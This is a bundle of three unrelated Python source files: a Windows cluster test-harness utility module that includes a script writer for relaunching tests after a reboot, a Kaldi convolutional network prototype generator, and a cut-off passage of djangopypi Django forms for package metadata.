        Cleans input. Removes single/double quotes and extra whitespace.
        Falsy values (None, "") are returned untouched.
    """
    if not val:
        return val
    return val.strip().strip('"').strip("'")

def cleanAsType(val):
    """
    Purpose:
        Cleans input with cleanValue() and runs ast.literal_eval(), so the
        value comes back as its deduced type (int, float, ...).  Strings
        that do not parse come back cleaned; non-string objects come back
        unchanged.
    """
    try:
        val = cleanValue(val)
        return ast.literal_eval(val)  # deduced type on success
    except (ValueError, SyntaxError, AttributeError):
        # ValueError/SyntaxError: not a literal -> return the cleaned string.
        # AttributeError: cleanValue() got a non-str -> val is still the
        # original object, return it as-is.
        return val
def doOnNodes(config, funcObj, expectedRetCode, message, hostnames):
    """
    Purpose:
        Generic wrapper for functions that run on some or all nodes.
        ``funcObj`` is expected to be a partial function (see
        functools.partial()) whose last argument is the node to run on.
        Returns ``expectedRetCode`` when every node matched it, else
        logs ``message`` and returns False.
    """
    # Resolve the targets: delimited string, list of strings, or (when
    # None) every hostname the config knows about.
    if hostnames is None:
        hostnameList = config.allHostnamesFromNodes
    elif isinstance(hostnames, str):
        hostnameList = config.splitAndLower(hostnames)
    else:
        hostnameList = config.splitAndLower(hostnames[0])

    resultDict = {}
    for hostname in hostnameList:
        # Entries still carrying the generic "node" placeholder have no
        # real hostname -- pass over them.
        if hostname.startswith("node"):
            continue
        resultDict[hostname] = funcObj(hostname)
        config.logger.debug("Function {}, ResultDict {}".
                            format(funcObj.__name__, resultDict))

    if any(result != expectedRetCode for result in resultDict.values()):
        config.logger.warning(message)
        return False
    return expectedRetCode
def isModule(path):
    """
    Purpose:
        Check to see if the file at ``path`` can be imported as a python
        module.  Missing files, import failures and syntax errors all
        yield False.
    """
    if not os.path.exists(path):
        return False
    try:
        imp.load_source(os.path.basename(path), path)
    except (ImportError, SyntaxError):
        return False
    return True
def md5sum(obj):
    """
    Purpose:
        Used to test hashes of objects. Returns the hex MD5 digest of
        ``obj`` (a bytes-like object).
    """
    digest = hashlib.md5(obj)
    return digest.hexdigest()
def md5File(pathToFile, blocksize=2**16):
    """
    Purpose:
        Finds the md5 hash of a file. If the file does not exist, returns
        None.
    """
    return _hashFile(hashlib.md5(), pathToFile, blocksize)

def sha1File(pathToFile, blocksize=2**16):
    """
    Purpose:
        Finds the sha1 hash of a file. If the file does not exist, returns
        None.
    """
    return _hashFile(hashlib.sha1(), pathToFile, blocksize)

def _hashFile(hashFunc, pathToFile, blocksize=2**16):
    """
    Purpose:
        Feed the file through ``hashFunc`` in ``blocksize`` chunks and
        return the hex digest, or None when the file does not exist.
    """
    if not os.path.exists(pathToFile):
        return None
    with open(pathToFile, 'rb') as fileHandle:
        # iter() with a b'' sentinel stops at EOF.
        for chunk in iter(lambda: fileHandle.read(blocksize), b''):
            hashFunc.update(chunk)
    return hashFunc.hexdigest()
def netHelp(retCode):
    """
    Purpose:
        Runs "net helpmsg <retCode>" and returns the help message (bytes).
        Useful for debug msgs.  Returns "Net help failed" when the command
        fails or when the "net" binary is unavailable (non-Windows hosts).
    """
    params = ["net", "helpmsg", "{}".format(retCode)]
    try:
        return subprocess.check_output(params, stderr=subprocess.STDOUT)
    except (subprocess.CalledProcessError, OSError):
        # OSError covers a missing "net" executable; previously that case
        # escaped as an uncaught exception.
        return "Net help failed"
def normjoin(*paths):
    """
    Purpose:
        Uses os.path functions to normalize and join paths. Returns the
        normalized, joined string, or None when any element cleans to a
        falsy value.
    Parameter
        *paths  all the paths you want to join
    """
    if any(not cleanValue(element) for element in paths):
        return None
    cleaned = []
    for raw in paths:
        element = cleanValue(raw)
        # Drop a leading slash on every element after the first so join()
        # does not discard the parts already collected.
        if cleaned and element[0] in ("/", "\\"):
            element = element[1:]
        cleaned.append(os.path.normpath(
            os.path.expandvars(
                os.path.expanduser(element))))
    # The * unpacks the list as arguments to join()
    return os.path.join(*cleaned)
def buildTempConfigFromStr(pathToTmpFile, configString, overrides=None):
    """
    Purpose:
        Parse ``configString`` with ExtendedInterpolation and write the
        interpolated result to ``pathToTmpFile`` via buildTempConfig().
        ``overrides`` is an optional read_dict()-shaped mapping applied
        before interpolation.
    """
    tmpConfig = ConfigParser(allow_no_value = True,
                             interpolation=ExtendedInterpolation())
    tmpConfig.read_string(configString)
    # None default instead of a shared mutable {} default argument.
    buildTempConfig(pathToTmpFile, tmpConfig,
                    overrides if overrides is not None else {})
def buildTempConfigFromFile(pathToTmpFile, configPaths, overrides=None):
    """
    Purpose:
        Output the results of ExtendedInterpolation to a file. If multiple
        config files are passed in they will be merged and written to the
        same file.  ``overrides`` is an optional read_dict()-shaped mapping
        applied before interpolation.
    """
    tmpConfig = ConfigParser(allow_no_value = True,
                             interpolation=ExtendedInterpolation())
    for path in configPaths:
        tmpConfig.read(path)
    # None default instead of a shared mutable {} default argument.
    buildTempConfig(pathToTmpFile, tmpConfig,
                    overrides if overrides is not None else {})
def buildTempConfig(pathToTmpFile, tmpConfig, overrides):
    """
    Purpose:
        Output the results of ExtendedInterpolation to a file. If multiple
        configparsers are passed in they will be written to the same file.
        Useful for anything that uses older versions of Python.
        Overrides are a dictionary used to replace values before
        Interpolation.  Needs to be in the same form as "read_dict()":
            { 'Section' : { 'Option' : 'Value' } }
    """
    tmpConfigDict = {}
    if len(overrides) > 0:
        tmpConfig.read_dict(overrides)
    # Iterate over options and use "get()" to execute the Interpolation
    for sec in tmpConfig.sections():
        tmpConfigDict[sec] = {}
        for opt, _ in tmpConfig[sec].items():
            tmpConfigDict[sec][opt] = cleanValue(tmpConfig.get(sec, opt))
    # Finished getting values. Write the dict back into the configparser
    tmpConfig.read_dict(tmpConfigDict)
    # Create the output directory when needed.  The empty-string guard
    # handles bare filenames (os.path.dirname -> ""), where os.mkdir("")
    # raised; makedirs also builds nested paths, which os.mkdir could not.
    tmpFileBasepath = os.path.dirname(pathToTmpFile)
    if tmpFileBasepath and not os.path.exists(tmpFileBasepath):
        os.makedirs(tmpFileBasepath)
    # Open the file handle and close it when done
    with open(pathToTmpFile, 'w') as fp:
        tmpConfig.write(fp, space_around_delimiters=False)
def runTestsStartupScript(config, testSuiteName):
    """
    Purpose:
        Create a PowerShell startup script that relaunches the given test
        suite after a reboot and then deletes itself.  Returns the path of
        the written script.
    """
    scriptName = "runtests-" + testSuiteName + ".ps1"
    # Both fragments are raw strings now: the second one previously used
    # "\S"/"\P", invalid escape sequences that warn on modern Python.  The
    # resulting text is unchanged.
    startupDir = normjoin("~", r"AppData\Roaming\Microsoft\Windows"
                               r"\Start Menu\Programs\Startup")
    scriptPath = normjoin(startupDir, scriptName)
    runTestPath = normjoin(config.paths["basedir"], "runtests.py")
    # This script will start the test, spawn a new powershell session that
    # deletes the script, and then exit.  The replace()'s escape spaces so
    # the paths are safe for PowerShell.
    scriptContent = """
    echo "Starting test suite {name} after reboot."
    start-process {pypath} -ArgumentList "{runtest} {name}" -PassThru
    start-process powershell.exe -ArgumentList "sleep 3 ; rm {flagfile}" -PassThru
    """.format(name=testSuiteName,
               pypath=sys.executable.replace(" ", "` "),
               flagfile=scriptPath.replace(" ", "` "),
               runtest=runTestPath.replace(" ","` "))
    if not os.path.exists(startupDir):
        # makedirs: the Startup path is several levels deep.
        os.makedirs(startupDir)
    with open(scriptPath, 'w') as scriptFP:
        scriptFP.write(scriptContent)
    return scriptPath
#-------------------------------------------------------------------------------
# Unused Utils - kept for reference
#-------------------------------------------------------------------------------
def getTargetSystem(node):
    """
    Purpose:
        Tries to figure out what to use as the "target". Tries each of the
        following; whichever is set first is returned: Hostname, Public IP,
        Private IP.  Falls back to "." when none are set.
    """
    # BUG FIX: the conditions were inverted ("if not ...") and returned the
    # empty value instead of the first populated one.
    if node.props["hostname"]:
        return node.props["hostname"]
    if node.props["publicip"]:
        return node.props["publicip"]
    if node.props["privateip"]:
        return node.props["privateip"]
    # Default to "." since we do not have a given target
    return "."
def getExternalHostIP():
    """
    Purpose:
        Get the host's IP.  Opens a UDP socket, "connects" it to the local
        hostname (no packets are sent) and reads the socket's own address.
        Returns None when the lookup fails.
    """
    import socket
    localSocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    hostname = socket.gethostname()
    # BUG FIX: hostip was previously unbound when connect() failed, so the
    # final return raised NameError instead of reporting the failure.
    hostip = None
    try:
        # Uses port 9, the RFC863 UDP discard port
        localSocket.connect((hostname, 9))
        hostip = localSocket.getsockname()[0]
    except socket.error:
        pass
    finally:
        # close() releases the descriptor deterministically (the old
        # "del localSocket" only dropped the reference).
        localSocket.close()
    return hostip
def getStaticHostIP():
    """
    Purpose:
        Get the IP address of the first interface. This should be the
        172.17.* address.
    """
    import socket
    # gethostbyname_ex() -> (hostname, aliases, ip_list); take the first IP.
    return socket.gethostbyname_ex(socket.gethostname())[2][0]
def buildPackage(_file, _excludeList):
    """
    Gets the list of modules for __all__ for the __init__.py files
    Parameters:
        _file           Name of module (typically the __name__ list)
        _excludeList    Dirs or modules you do not want to import
    Returns:
        list of all modules in directory, or None when the directory
        cannot be listed
    """
    packageList = []
    # Copy before extending so the caller's list is not mutated.
    excludes = list(_excludeList) + ['__init__.py', '__pycache__']
    # splits _file to get the directory holding the package
    _cwd = os.path.dirname(_file)
    try:
        for mod in os.listdir(_cwd):
            if os.path.basename(mod) in excludes:
                continue
            # BUG FIX: isdir() must be checked against the package dir;
            # the bare name resolved relative to the process CWD before.
            fullPath = os.path.join(_cwd, mod)
            if os.path.isdir(fullPath) or os.path.splitext(mod)[1] == ".py":
                mod = os.path.basename(mod)
                packageList.append(os.path.splitext(mod)[0])
    except OSError:
        # Narrowed from a bare except that also hid programming errors.
        return
    return packageList
if __name__ == '__main__':
    # Ad-hoc manual smoke test: builds a dkconfig from the lab .ini files
    # and writes a reboot-startup script.  The "##"-commented blocks below
    # are kept as reference invocations of other utilities in this module.
    from dkconfig import dkconfig
    config = dkconfig(r"c:\Programs\dk_test\scenarios\cluster.ini",
                      r"c:\Programs\dk_test\scenarios\constants.ini")
    #### runTestFromIni(config, "createmirror",
    ####     r"c:\Programs\dk_test\scenarios\emcmdapi\create\emcmd_createmirror.ini")
    ## config.runEnvSetup()
    ## import winfuncs
    ## import functools
    ## delJobsFromNode = functools.partial(winfuncs.deletealljobsfromnode, config)
    ## delJobsFromNode.__name__ = "del"
    ## doOnNodes(config, delJobsFromNode, 0, "dfd", "cae-qa-v83")
    ## cmd = ['C:\\Program Files (x86)\\Steeleye\\DataKeeper\\emcmd.exe',
    ##        '172.17.105.148',
    ##        'CREATEJOB',
    ##        'switchover-job',
    ##        'test',
    ##        'cae-qa-v82.qagroup.com',
    ##        'E',
    ##        '0.0.0.0',
    ##        'cae-qa-v83.qagroup.com',
    ##        'E',
    ##        '0.0.0.0',
    ##        'D',
    ##        'cae-qa-v82.qagroup.com',
    ##        'E',
    ##        '172.17.105.148',
    ##        'cae-qa-v84.qagroup.com',
    ##        'E',
    ##        '172.17.105.150',
    ##        's',
    ##        'cae-qa-v83.qagroup.com',
    ##        'E',
    ##        '172.17.105.149',
    ##        'cae-qa-v84.qagroup.com', 'E', '172.17.105.150', 's']
    ## subprocess.check_call(cmd)
    runTestsStartupScript(config, "blah")
    pass
| |
#!/usr/bin/python
# Copyright 2014 Brno University of Technology (author: Karel Vesely)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# THIS CODE IS PROVIDED *AS IS* BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, EITHER EXPRESS OR IMPLIED, INCLUDING WITHOUT LIMITATION ANY IMPLIED
# WARRANTIES OR CONDITIONS OF TITLE, FITNESS FOR A PARTICULAR PURPOSE,
# MERCHANTABLITY OR NON-INFRINGEMENT.
# See the Apache 2 License for the specific language governing permissions and
# limitations under the License.
# Generated Nnet prototype, to be initialized by 'nnet-initialize'.
import math, random, sys
from optparse import OptionParser
###
### Parse options
###
usage="%prog [options] <feat-dim> <num-leaves> <num-hidden-layers> <num-hidden-neurons> >nnet-proto-file"
parser = OptionParser(usage)
# Output non-linearity options
parser.add_option('--no-softmax', dest='with_softmax',
                  help='Do not put <SoftMax> in the prototype [default: %default]',
                  default=True, action='store_false');
parser.add_option('--activation-type', dest='activation_type',
                  help='Select type of activation function : (<Sigmoid>|<Tanh>) [default: %default]',
                  default='<Sigmoid>', type='string');
# Weight/bias initialization options
parser.add_option('--hid-bias-mean', dest='hid_bias_mean',
                  help='Set bias for hidden activations [default: %default]',
                  default=-2.0, type='float');
parser.add_option('--hid-bias-range', dest='hid_bias_range',
                  help='Set bias range for hidden activations (+/- 1/2 range around mean) [default: %default]',
                  default=4.0, type='float');
parser.add_option('--param-stddev-factor', dest='param_stddev_factor',
                  help='Factor to rescale Normal distriburtion for initalizing weight matrices [default: %default]',
                  default=0.1, type='float');
parser.add_option('--bottleneck-dim', dest='bottleneck_dim',
                  help='Make bottleneck network with desired bn-dim (0 = no bottleneck) [default: %default]',
                  default=0, type='int');
parser.add_option('--no-glorot-scaled-stddev', dest='with_glorot', help='Generate normalized weights according to X.Glorot paper, but mapping U->N with same variance (factor sqrt(x/(dim_in+dim_out)))', action='store_false', default=True)
parser.add_option('--no-smaller-input-weights', dest='smaller_input_weights',
                  help='Disable 1/12 reduction of stddef in input layer [default: %default]',
                  action='store_false', default=True);
# Convolutional front-end options
parser.add_option('--num-filters1', dest='num_filters1',
                  help='Number of filters in first convolutional layer [default: %default]',
                  default=128, type='int')
parser.add_option('--num-filters2', dest='num_filters2',
                  help='Number of filters in second convolutional layer [default: %default]',
                  default=256, type='int')
parser.add_option('--pool-size', dest='pool_size',
                  help='Size of pooling [default: %default]',
                  default=3, type='int')
parser.add_option('--pool-step', dest='pool_step',
                  help='Step of pooling [default: %default]',
                  default=3, type='int')
parser.add_option('--pool-type', dest='pool_type',
                  help='Type of pooling (Max || Average) [default: %default]',
                  default='Max', type='string')
# Feature-layout options (pitch / deltas / splicing / patches)
parser.add_option('--pitch-dim', dest='pitch_dim',
                  help='Number of features representing pitch [default: %default]',
                  default=0, type='int')
parser.add_option('--delta-order', dest='delta_order',
                  help='Order of delta features [default: %default]',
                  default=2, type='int')
parser.add_option('--splice', dest='splice',
                  help='Length of splice [default: %default]',
                  default=5,type='int')
parser.add_option('--patch-step1', dest='patch_step1',
                  help='Patch step of first convolutional layer [default: %default]',
                  default=1, type='int')
parser.add_option('--patch-dim1', dest='patch_dim1',
                  help='Lenght of patch of first convolutional layer [default: %default]',
                  default=9, type='int')
parser.add_option('--dir', dest='dirct',
                  help='Directory, where network prototypes will be saved [default: %default]',
                  default='.', type='string')
parser.add_option('--num-pitch-neurons', dest='num_pitch_neurons',
                  help='Number of neurons in layers processing pitch features [default: %default]',
                  default='200', type='int')
(o,args) = parser.parse_args()
if len(args) != 4 :
    parser.print_help()
    sys.exit(1)
# Positional args: <feat-dim> <num-leaves> <num-hidden-layers> <num-hidden-neurons>
(feat_dim, num_leaves, num_hid_layers, num_hid_neurons) = map(int,args);
### End parse options
# NOTE(review): the "/" below relies on Python 2 integer division (this is a
# Python 2 script -- see the print statements further down).
feat_raw_dim = feat_dim / (o.delta_order+1) / (o.splice*2+1) - o.pitch_dim # we need number of feats without deltas and splice and pitch
# Sanity-check the parsed dimensions and options
assert(feat_dim > 0)
assert(num_leaves > 0)
assert(num_hid_layers >= 0)
assert(num_hid_neurons > 0)
assert(o.pool_type == 'Max' or o.pool_type == 'Average')
# Optionaly scale
def Glorot(dim1, dim2):
    """Glorot/Xavier scale factor for a (dim1 x dim2) weight matrix;
    1.0 when --no-glorot-scaled-stddev was given."""
    if not o.with_glorot:
        return 1.0
    # 35.0 = magic number, gives ~1.0 in inner layers for hid-dim 1024dim,
    return 35.0 * math.sqrt(2.0 / (dim1 + dim2))
###
### Print prototype of the network
###
# Begin the prototype
print "<NnetProto>"
# Convolutional part of network
# NOTE(review): the "/" divisions below rely on Python 2 integer division.
num_patch1 = 1 + (feat_raw_dim - o.patch_dim1) / o.patch_step1
num_pool = 1 + (num_patch1 - o.pool_size) / o.pool_step
# Layer-2 patches span 4 consecutive pooled filter groups of layer 1
patch_dim2 = 4 * o.num_filters1
patch_step2 = o.num_filters1
patch_stride2 = num_pool * o.num_filters1
num_patch2 = 1 + (num_pool * o.num_filters1 - patch_dim2) / patch_step2
# First convolution + pooling + rescale/shift + activation
convolution_proto = ''
convolution_proto += "<ConvolutionalComponent> <InputDim> %d <OutputDim> %d <PatchDim> %d <PatchStep> %d <PatchStride> %d <BiasMean> %f <BiasRange> %f <ParamStddev> %f\n" % \
    (feat_raw_dim * (o.delta_order+1) * (o.splice*2+1), o.num_filters1 * num_patch1, o.patch_dim1, o.patch_step1, feat_raw_dim, 0.0, 0.0, 0.01)
convolution_proto += "<%sPoolingComponent> <InputDim> %d <OutputDim> %d <PoolSize> %d <PoolStep> %d <PoolStride> %d\n" % \
    (o.pool_type, o.num_filters1*num_patch1, o.num_filters1*num_pool, o.pool_size, o.pool_step, o.num_filters1)
convolution_proto += "<Rescale> <InputDim> %d <OutputDim> %d <InitParam> %f\n" % \
    (o.num_filters1*num_pool, o.num_filters1*num_pool, 1.0)
convolution_proto += "<AddShift> <InputDim> %d <OutputDim> %d <InitParam> %f\n" % \
    (o.num_filters1*num_pool, o.num_filters1*num_pool, 0.0)
convolution_proto += "%s <InputDim> %d <OutputDim> %d\n" % \
    (o.activation_type, o.num_filters1*num_pool, o.num_filters1*num_pool)
# Second convolution + rescale/shift + activation
convolution_proto += "<ConvolutionalComponent> <InputDim> %d <OutputDim> %d <PatchDim> %d <PatchStep> %d <PatchStride> %d <BiasMean> %f <BiasRange> %f <ParamStddev> %f\n" % \
    (o.num_filters1*num_pool, o.num_filters2*num_patch2, patch_dim2, patch_step2, patch_stride2, -2.0, 4.0, 0.1)
convolution_proto += "<Rescale> <InputDim> %d <OutputDim> %d <InitParam> %f\n" % \
    (o.num_filters2 * num_patch2, o.num_filters2*num_patch2, 1.0)
convolution_proto += "<AddShift> <InputDim> %d <OutputDim> %d <InitParam> %f\n" % \
    (o.num_filters2*num_patch2, o.num_filters2*num_patch2, 0.0)
convolution_proto += "%s <InputDim> %d <OutputDim> %d\n" % \
    (o.activation_type, o.num_filters2*num_patch2, o.num_filters2*num_patch2)
if (o.pitch_dim > 0):
    # convolutional part -- written to its own nested prototype file
    f_conv = open('%s/nnet.proto.convolution' % o.dirct, 'w')
    f_conv.write('<NnetProto>\n')
    f_conv.write(convolution_proto)
    f_conv.write('</NnetProto>\n')
    f_conv.close()
    # pitch part -- a small 2-layer MLP processing only the pitch features
    f_pitch = open('%s/nnet.proto.pitch' % o.dirct, 'w')
    f_pitch.write('<NnetProto>\n')
    f_pitch.write('<AffineTransform> <InputDim> %d <OutputDim> %d <BiasMean> %f <BiasRange> %f <ParamStddev> %f\n' % \
        ((o.pitch_dim * (o.delta_order+1) * (o.splice*2+1)), o.num_pitch_neurons, -2.0, 4.0, 0.109375))
    f_pitch.write('%s <InputDim> %d <OutputDim> %d\n' % \
        (o.activation_type, o.num_pitch_neurons, o.num_pitch_neurons))
    f_pitch.write('<AffineTransform> <InputDim> %d <OutputDim> %d <BiasMean> %f <BiasRange> %f <ParamStddev> %f\n' % \
        (o.num_pitch_neurons, o.num_pitch_neurons, -2.0, 4.0, 0.109375))
    f_pitch.write('%s <InputDim> %d <OutputDim> %d\n' % \
        (o.activation_type, o.num_pitch_neurons, o.num_pitch_neurons))
    f_pitch.write('</NnetProto>\n')
    f_pitch.close()
    # parallel part -- <Copy> regroups the interleaved base/pitch feature
    # dims so each nested network receives a contiguous slice
    vector = ''
    for i in range(1, (feat_raw_dim + o.pitch_dim) * (o.delta_order+1) * (o.splice*2+1), feat_raw_dim + o.pitch_dim):
        vector += '%d:1:%d ' % (i, i + feat_raw_dim - 1)
    for i in range(feat_raw_dim+1, (feat_raw_dim + o.pitch_dim) * (o.delta_order+1) * (o.splice*2+1), feat_raw_dim + o.pitch_dim):
        vector += '%d:1:%d ' % (i, i + o.pitch_dim - 1)
    print '<Copy> <InputDim> %d <OutputDim> %d <BuildVector> %s </BuildVector> ' % \
        ((feat_raw_dim + o.pitch_dim) * (o.delta_order+1) * (o.splice*2+1), (feat_raw_dim + o.pitch_dim) * (o.delta_order+1) * (o.splice*2+1), vector)
    print '<ParallelComponent> <InputDim> %d <OutputDim> %d <NestedNnetProto> %s %s </NestedNnetProto>' % \
        ((feat_raw_dim + o.pitch_dim) * (o.delta_order+1) * (o.splice*2+1), o.num_pitch_neurons + o.num_filters2*num_patch2, '%s/nnet.proto.convolution' % o.dirct, '%s/nnet.proto.pitch' % o.dirct)
    num_convolution_output = o.num_pitch_neurons + o.num_filters2*num_patch2
else: # no pitch
    print convolution_proto
    num_convolution_output = o.num_filters2*num_patch2
# Only last layer (logistic regression) when no hidden layers were requested
if num_hid_layers == 0:
    print "<AffineTransform> <InputDim> %d <OutputDim> %d <BiasMean> %f <BiasRange> %f <ParamStddev> %f" % \
        (num_convolution_output, num_leaves, 0.0, 0.0, (o.param_stddev_factor * Glorot(feat_dim, num_leaves)))
    if o.with_softmax:
        print "<Softmax> <InputDim> %d <OutputDim> %d" % (num_leaves, num_leaves)
    print "</NnetProto>"
    # We are done!
    sys.exit(0)
# Assuming we have >0 hidden layers
assert(num_hid_layers > 0)
# First AffineTransform (convolution output -> first hidden layer)
print "<AffineTransform> <InputDim> %d <OutputDim> %d <BiasMean> %f <BiasRange> %f <ParamStddev> %f" % \
    (num_convolution_output, num_hid_neurons, o.hid_bias_mean, o.hid_bias_range, \
    (o.param_stddev_factor * Glorot(feat_dim, num_hid_neurons) * \
    (math.sqrt(1.0/12.0) if o.smaller_input_weights else 1.0)))
# stddev(U[0,1]) = sqrt(1/12); reducing stddev of weights,
# the dynamic range of input data is larger than of a Sigmoid.
print "%s <InputDim> %d <OutputDim> %d" % (o.activation_type, num_hid_neurons, num_hid_neurons)
# Internal AffineTransforms (one affine + activation per remaining layer)
for i in range(num_hid_layers-1):
    print "<AffineTransform> <InputDim> %d <OutputDim> %d <BiasMean> %f <BiasRange> %f <ParamStddev> %f" % \
        (num_hid_neurons, num_hid_neurons, o.hid_bias_mean, o.hid_bias_range, \
        (o.param_stddev_factor * Glorot(num_hid_neurons, num_hid_neurons)))
    print "%s <InputDim> %d <OutputDim> %d" % (o.activation_type, num_hid_neurons, num_hid_neurons)
# Optionally add bottleneck
if o.bottleneck_dim != 0:
    assert(o.bottleneck_dim > 0)
    # 25% smaller stddev -> small bottleneck range, 10x smaller learning rate
    print "<LinearTransform> <InputDim> %d <OutputDim> %d <ParamStddev> %f <LearnRateCoef> %f" % \
        (num_hid_neurons, o.bottleneck_dim, \
        (o.param_stddev_factor * Glorot(num_hid_neurons, o.bottleneck_dim) * 0.75 ), 0.1)
    # 25% smaller stddev -> smaller gradient in prev. layer, 10x smaller learning rate for weigts & biases
    print "<AffineTransform> <InputDim> %d <OutputDim> %d <BiasMean> %f <BiasRange> %f <ParamStddev> %f <LearnRateCoef> %f <BiasLearnRateCoef> %f" % \
        (o.bottleneck_dim, num_hid_neurons, o.hid_bias_mean, o.hid_bias_range, \
        (o.param_stddev_factor * Glorot(o.bottleneck_dim, num_hid_neurons) * 0.75 ), 0.1, 0.1)
    print "%s <InputDim> %d <OutputDim> %d" % (o.activation_type, num_hid_neurons, num_hid_neurons)
# Last AffineTransform (10x smaller learning rate on bias)
print "<AffineTransform> <InputDim> %d <OutputDim> %d <BiasMean> %f <BiasRange> %f <ParamStddev> %f <LearnRateCoef> %f <BiasLearnRateCoef> %f" % \
    (num_hid_neurons, num_leaves, 0.0, 0.0, \
    (o.param_stddev_factor * Glorot(num_hid_neurons, num_leaves)), 1.0, 0.1)
# Optionally append softmax
if o.with_softmax:
    print "<Softmax> <InputDim> %d <OutputDim> %d" % (num_leaves, num_leaves)
# End the prototype
print "</NnetProto>"
# We are done!
sys.exit(0)
| |
from os.path import basename
from django import forms
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from djangopypi.settings import settings
from djangopypi.models import Package, Classifier, Release, Distribution
class SimplePackageSearchForm(forms.Form):
    """Single-field form backing the simple package search box."""
    query = forms.CharField(max_length=255)
class PackageForm(forms.ModelForm):
    """Edit form for a Package; the name is excluded so it cannot be
    changed after creation."""
    class Meta:
        model = Package
        exclude = ['name']
class DistributionUploadForm(forms.ModelForm):
    """Upload form for one distribution file of a release.

    ``clean_content`` rejects uploads whose target filename already exists
    in storage; overwriting (DJANGOPYPI_ALLOW_VERSION_OVERWRITE) is
    recognized but not implemented yet.
    """
    class Meta:
        model = Distribution
        fields = ('content','comment','filetype','pyversion',)

    def clean_content(self):
        content = self.cleaned_data['content']
        storage = self.instance.content.storage
        field = self.instance.content.field
        # Compute the storage name the uploaded file would be saved under.
        name = field.generate_filename(instance=self.instance,
                                       filename=content.name)
        if not storage.exists(name):
            # NOTE(review): Python 2 print statement -- debugging leftover
            # that writes to stdout on every fresh upload.
            print '%s does not exist' % (name,)
            return content
        if settings.DJANGOPYPI_ALLOW_VERSION_OVERWRITE:
            raise forms.ValidationError('Version overwrite is not yet handled')
        raise forms.ValidationError('That distribution already exists, please '
                                    'delete it first before uploading a new '
                                    'version.')
class ReleaseForm(forms.ModelForm):
    """Edit form for a Release; the metadata version is chosen from the
    keys of the configured DJANGOPYPI_METADATA_FIELDS mapping."""
    metadata_version = forms.CharField(widget=forms.Select(choices=zip(settings.DJANGOPYPI_METADATA_FIELDS.keys(),
                                                                       settings.DJANGOPYPI_METADATA_FIELDS.keys())))
    class Meta:
        model = Release
        exclude = ['package', 'version', 'package_info']
# License choices for Metadata-Version 1.0 releases; used to populate the
# <select> widget of the Metadata 1.0 form's license field.
metadata10licenses = ('Artistic', 'BSD', 'DFSG', 'GNU GPL', 'GNU LGPL',
                      'MIT', 'Mozilla PL', 'public domain', 'Python',
                      'Qt', 'PL', 'Zope PL', 'unknown', 'nocommercial', 'nosell',
                      'nosource', 'shareware', 'other')
class LinesField(forms.CharField):
    """A CharField rendered as a textarea whose cleaned value is the list
    of stripped lines of the input."""

    def __init__(self, *args, **kwargs):
        # Default to a textarea so multi-line input is natural.
        kwargs.setdefault('widget', forms.Textarea())
        super(LinesField, self).__init__(*args, **kwargs)

    def to_python(self, value):
        # List comprehension instead of map(): identical on Python 2 and,
        # unlike map(), still a real list (not a lazy iterator) on Python 3.
        return [line.strip() for line in
                super(LinesField, self).to_python(value).split('\n')]
class Metadata10Form(forms.Form):
    """Form for editing release metadata fields of metadata version 1.0.

    Each form field mirrors one metadata field; the ``license`` choices
    are restricted to the ``metadata10licenses`` tuple defined in this
    module.
    """
    platform = LinesField(required=False,
                          help_text=_(u'A comma-separated list of platform '
                                        'specifications, summarizing the '
                                        'operating systems supported by the '
                                        'package.'))
    summary = forms.CharField(help_text=_(u'A one-line summary of what the '
                                           'package does.'))
    description = forms.CharField(required=False,
                                  widget=forms.Textarea(attrs=dict(rows=40,
                                                                   columns=40)),
                                  help_text=_(u'A longer description of the '
                                               'package that can run to several '
                                               'paragraphs. If this is in '
                                               'reStructuredText format, it will '
                                               'be rendered nicely on display.'))
    keywords = forms.CharField(help_text=_(u'A list of additional keywords to '
                                            'be used to assist searching for the '
                                            'package in a larger catalog'))
    # NOTE(review): verify_exists was removed in newer Django versions —
    # confirm against the project's pinned Django release.
    home_page = forms.URLField(required=False, verify_exists=True,
                               help_text=_(u'A string containing the URL for '
                                            'the package\'s home page.'))
    author = forms.CharField(required=False,
                             widget=forms.Textarea(attrs=dict(rows=3,
                                                              columns=20)),
                             help_text=_(u'A string containing at a minimum the '
                                          'author\'s name. Contact information '
                                          'can also be added, separating each '
                                          'line with newlines.'))
    author_email = forms.CharField(help_text=_(u'A string containing the '
                                                'author\'s e-mail address. It '
                                                'can contain a name and e-mail '
                                                'address in the legal forms for '
                                                'a RFC-822 \'From:\' header.'))
    license = forms.CharField(max_length=32,
                              help_text=_(u'A string selected from a short list '
                                           'of choices, specifying the license '
                                           'covering the package.'),
                              widget=forms.Select(choices=(zip(metadata10licenses,
                                                               metadata10licenses))))
class Metadata11Form(Metadata10Form):
    """Form for metadata version 1.1.

    Extends the 1.0 form with Trove classifiers and requires/provides/
    obsoletes line lists; redefines keywords, download_url and license as
    optional free-form fields.
    """
    supported_platform = forms.CharField(required=False, widget=forms.Textarea(),
                                         help_text=_(u'The OS and CPU for which '
                                                      'the binary package was '
                                                      'compiled.'))
    keywords = forms.CharField(required=False,
                               help_text=_(u'A list of additional keywords to '
                                            'be used to assist searching for the '
                                            'package in a larger catalog'))
    # NOTE(review): verify_exists was removed in newer Django versions —
    # confirm against the project's pinned Django release.
    download_url = forms.URLField(required=False, verify_exists=True,
                                  help_text=_(u'A string containing the URL for '
                                               'the package\'s home page.'))
    license = forms.CharField(required=False, widget=forms.Textarea(),
                              help_text=_(u'Text indicating the license '
                                           'covering the package where the '
                                           'license is not a selection from the '
                                           '"License" Trove classifiers.'))
    classifier = forms.ModelMultipleChoiceField(required=False,
                                                queryset=Classifier.objects.all(),
                                                help_text=_(u'Trove classifiers'))
    requires = LinesField(required=False,
                          help_text=_(u'Each line contains a string describing '
                                       'some other module or package required by '
                                       'this package.'))
    provides = LinesField(required=False,
                          help_text=_(u'Each line contains a string describing '
                                       'a package or module that will be '
                                       'provided by this package once it is '
                                       'installed'))
    obsoletes = LinesField(required=False,
                           help_text=_(u'Each line contains a string describing '
                                        'a package or module that this package '
                                        'renders obsolete, meaning that the two '
                                        'packages should not be installed at the '
                                        'same time'))
class Metadata12Form(Metadata10Form):
    """Form for metadata version 1.2.

    Note this subclasses Metadata10Form (not Metadata11Form) and declares
    its own 1.2 fields: maintainer contact fields and the ``*_dist`` /
